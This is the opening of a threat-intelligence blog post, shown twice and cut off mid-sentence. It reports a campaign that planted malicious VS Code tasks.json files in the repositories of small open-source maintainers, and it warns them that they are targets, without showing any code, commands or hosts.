Small Open-Source Maintainers Targeted by VS Code Tasks Malware
Contents
Small Open-Source Maintainers Targeted by VS Code Tasks Malware
At least 21 small OSS maintainers hit in 72 hours via malicious VS Code task configurations
6mile
January 26, 2026
5 min read
“contagious-interview”
supply-chain
github
vscode
VS Code Tasks Campaign
The OpenSourceMalware team has identified an ongoing campaign targeting open-source maintainers through VS Code task configurations. Over the past 72 hours, we've observed 21 contributors had their repositories compromised with potentially malicious .vscode/tasks.json files that silently download and run bash and powershell scripts from a third-party domain.
The key takeaway: if you maintain an open-source project, you are a target, regardless of how small or obscure your project may seem.
TL;DR
Threat Actor: Unknown, but using DPRK TTPs
Attack Vector: Malicious .vscode/tasks.json files planted in repositories
Scale: 21 maintainers/contributors compromised in 72 hours
Key Insight: Small project maintainers are being actively targeted
You are not too small to be a target
There's a dangerous misconception in the open-source community: "My project only has a few stars so why …
At least 21 small OSS maintainers hit in 72 hours via malicious VS Code task configurations
6mile
January 26, 2026
5 min read
“contagious-interview”
supply-chain
github
vscode
VS Code Tasks Campaign
The OpenSourceMalware team has identified an ongoing campaign targeting open-source maintainers through VS Code task configurations. Over the past 72 hours, we've observed 21 contributors had their repositories compromised with potentially malicious .vscode/tasks.json files that silently download and run bash and powershell scripts from a third-party domain.
The key takeaway: if you maintain an open-source project, you are a target, regardless of how small or obscure your project may seem.
TL;DR
Threat Actor: Unknown, but using DPRK TTPs
Attack Vector: Malicious .vscode/tasks.json files planted in repositories
Scale: 21 maintainers/contributors compromised in 72 hours
Key Insight: Small project maintainers are being actively targeted
You are not too small to be a target
There's a dangerous misconception in the open-source community: "My project only has a few stars so why …